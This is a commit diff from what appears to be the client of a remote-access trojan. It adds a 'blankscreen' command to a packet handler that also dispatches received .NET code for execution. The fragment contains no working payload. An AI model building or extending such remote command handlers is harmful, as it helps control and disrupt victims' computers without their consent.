Added call handler to packets.cs
This commit is contained in:
parent
3acc737040
commit
321601a704
@ -297,6 +297,11 @@ namespace Client.Handle_Packet
|
|||||||
new HandlerExecuteDotNetCode(unpack_msgpack);
|
new HandlerExecuteDotNetCode(unpack_msgpack);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
|
case "blankscreen":
|
||||||
|
{
|
||||||
|
new HandleBlankScreen();
|
||||||
|
break;
|
||||||
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
catch (Exception ex)
|
catch (Exception ex)
|
||||||
|
Loading…
x
Reference in New Issue
Block a user